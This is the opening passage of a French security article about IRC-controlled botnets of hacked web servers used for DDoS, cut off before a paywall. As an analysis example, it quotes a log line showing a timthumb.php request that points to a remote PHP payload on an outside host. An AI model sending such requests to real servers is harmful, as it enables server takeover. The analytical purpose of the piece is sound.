Pour lancer un DDoS, il faut évidemment contrôler plusieurs machines. Mais au lieu de prendre la main sur le PC poussif de monsieur tout le monde simplement connecté via l'ADSL, pourquoi ne pas prendre directement la main sur des serveurs Web ?
1. Introduction
Qui ne s’est jamais posé cette question en regardant les logs d’accès de son serveur web ; quelle est cette étrange ligne de log ?
"GET /wp-content/themes/modularity/includes/timthumb.php?src=http://picasa.com.rnt.ca/bat.php HTTP/1.1\”
Ces lignes de logs mettent à jour tout un petit monde de botnets constitué de serveurs web Zombies lardés de backdoors le tout opérant principalement au travers d’IRC. C’est cet écosystème, les us et coutumes de quelques groupes de pirates, et l'utilisation de ces botnets dans le cadre d’un DDoS que nous allons découvrir et tenter de décrypter. Tous les samples que nous allons voir ici sont disponibles sur [AVCaesar], leurs hashs MD5 est disponible dans la section liens.
Les vecteurs d’infections des machines membres de ces botnets sont principalement les failles des applications web (CMS, moteurs de blogs,…
- Accédez à tous les contenus de Connect en illimité
- Découvrez des listes de lecture et des contenus Premium
- Consultez les nouveaux articles en avant-première